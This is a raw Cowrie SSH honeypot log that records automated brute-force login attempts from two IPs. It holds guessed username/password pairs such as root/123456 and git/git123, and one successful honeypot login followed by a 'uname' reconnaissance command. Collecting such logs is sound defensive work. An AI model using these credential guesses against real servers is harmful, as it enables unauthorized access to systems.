{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56088,"dst_ip":"1.2.3.4","dst_port":22,"session":"b971b8562c24","protocol":"ssh","message":"New connection: 51.79.164.132:56088 (1.2.3.4:22) [session: b971b8562c24]","sensor":"my-vps","timestamp":"2025-08-28T09:00:26.719588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:00:27.169568Z","src_ip":"51.79.164.132","session":"b971b8562c24"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:00:27.170928Z","src_ip":"51.79.164.132","session":"b971b8562c24"}
{"eventid":"cowrie.login.failed","username":"root","password":"123456","message":"login attempt [root/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:00:29.121642Z","src_ip":"51.79.164.132","session":"b971b8562c24"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:00:30.493873Z","src_ip":"51.79.164.132","session":"b971b8562c24"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":35960,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fd8f29143ae","protocol":"ssh","message":"New connection: 185.93.89.7:35960 (1.2.3.4:22) [session: 6fd8f29143ae]","sensor":"my-vps","timestamp":"2025-08-28T09:00:32.211217Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:00:32.212991Z","src_ip":"185.93.89.7","session":"6fd8f29143ae"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:00:32.229882Z","src_ip":"185.93.89.7","session":"6fd8f29143ae"}
{"eventid":"cowrie.login.failed","username":"index","password":"index@123","message":"login attempt [index/index@123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:00:32.283175Z","src_ip":"185.93.89.7","session":"6fd8f29143ae"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:00:33.321596Z","src_ip":"185.93.89.7","session":"6fd8f29143ae"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":45888,"dst_ip":"1.2.3.4","dst_port":22,"session":"6e0b1cc622ad","protocol":"ssh","message":"New connection: 51.79.164.132:45888 (1.2.3.4:22) [session: 6e0b1cc622ad]","sensor":"my-vps","timestamp":"2025-08-28T09:00:53.377589Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:00:53.547401Z","src_ip":"51.79.164.132","session":"6e0b1cc622ad"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:00:54.112570Z","src_ip":"51.79.164.132","session":"6e0b1cc622ad"}
{"eventid":"cowrie.login.failed","username":"git","password":"git123","message":"login attempt [git/git123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:00:55.247493Z","src_ip":"51.79.164.132","session":"6e0b1cc622ad"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":53530,"dst_ip":"1.2.3.4","dst_port":22,"session":"c90bdcb34db5","protocol":"ssh","message":"New connection: 185.93.89.7:53530 (1.2.3.4:22) [session: c90bdcb34db5]","sensor":"my-vps","timestamp":"2025-08-28T09:00:55.894823Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:00:55.895769Z","src_ip":"185.93.89.7","session":"c90bdcb34db5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:00:55.913441Z","src_ip":"185.93.89.7","session":"c90bdcb34db5"}
{"eventid":"cowrie.login.failed","username":"index","password":"index@","message":"login attempt [index/index@] failed","sensor":"my-vps","timestamp":"2025-08-28T09:00:55.950783Z","src_ip":"185.93.89.7","session":"c90bdcb34db5"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:00:56.828573Z","src_ip":"51.79.164.132","session":"6e0b1cc622ad"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:00:56.972358Z","src_ip":"185.93.89.7","session":"c90bdcb34db5"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":55876,"dst_ip":"1.2.3.4","dst_port":22,"session":"aeb27164f36a","protocol":"ssh","message":"New connection: 51.79.164.132:55876 (1.2.3.4:22) [session: aeb27164f36a]","sensor":"my-vps","timestamp":"2025-08-28T09:01:19.333358Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:01:19.491234Z","src_ip":"51.79.164.132","session":"aeb27164f36a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":59740,"dst_ip":"1.2.3.4","dst_port":22,"session":"2b803b34180b","protocol":"ssh","message":"New connection: 185.93.89.7:59740 (1.2.3.4:22) [session: 2b803b34180b]","sensor":"my-vps","timestamp":"2025-08-28T09:01:19.788563Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:01:19.799016Z","src_ip":"185.93.89.7","session":"2b803b34180b"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:01:19.827403Z","src_ip":"185.93.89.7","session":"2b803b34180b"}
{"eventid":"cowrie.login.failed","username":"index","password":"123456","message":"login attempt [index/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T09:01:19.888112Z","src_ip":"185.93.89.7","session":"2b803b34180b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:01:19.978857Z","src_ip":"51.79.164.132","session":"aeb27164f36a"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:01:20.959175Z","src_ip":"185.93.89.7","session":"2b803b34180b"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger123","message":"login attempt [ranger/ranger123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:01:21.302577Z","src_ip":"51.79.164.132","session":"aeb27164f36a"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:01:22.812667Z","src_ip":"51.79.164.132","session":"aeb27164f36a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":34416,"dst_ip":"1.2.3.4","dst_port":22,"session":"7de4d666dbe4","protocol":"ssh","message":"New connection: 185.93.89.7:34416 (1.2.3.4:22) [session: 7de4d666dbe4]","sensor":"my-vps","timestamp":"2025-08-28T09:01:43.807051Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:01:43.843720Z","src_ip":"185.93.89.7","session":"7de4d666dbe4"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:01:43.844985Z","src_ip":"185.93.89.7","session":"7de4d666dbe4"}
{"eventid":"cowrie.login.failed","username":"index","password":"123","message":"login attempt [index/123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:01:44.002526Z","src_ip":"185.93.89.7","session":"7de4d666dbe4"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:01:45.023214Z","src_ip":"185.93.89.7","session":"7de4d666dbe4"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":34914,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d0f4c12fae1","protocol":"ssh","message":"New connection: 51.79.164.132:34914 (1.2.3.4:22) [session: 1d0f4c12fae1]","sensor":"my-vps","timestamp":"2025-08-28T09:01:46.227740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:01:46.704098Z","src_ip":"51.79.164.132","session":"1d0f4c12fae1"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:01:46.705006Z","src_ip":"51.79.164.132","session":"1d0f4c12fae1"}
{"eventid":"cowrie.login.success","username":"root","password":"1Q2W3E4R","message":"login attempt [root/1Q2W3E4R] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:01:49.131380Z","src_ip":"51.79.164.132","session":"1d0f4c12fae1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:01:50.252063Z","src_ip":"51.79.164.132","session":"1d0f4c12fae1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:01:50.253006Z","src_ip":"51.79.164.132","session":"1d0f4c12fae1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:01:50.448101Z","src_ip":"51.79.164.132","session":"1d0f4c12fae1"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:01:50.449282Z","src_ip":"51.79.164.132","session":"1d0f4c12fae1"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":50212,"dst_ip":"1.2.3.4","dst_port":22,"session":"96c3d92eff02","protocol":"ssh","message":"New connection: 185.93.89.7:50212 (1.2.3.4:22) [session: 96c3d92eff02]","sensor":"my-vps","timestamp":"2025-08-28T09:02:07.462231Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:02:07.473024Z","src_ip":"185.93.89.7","session":"96c3d92eff02"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:02:07.526714Z","src_ip":"185.93.89.7","session":"96c3d92eff02"}
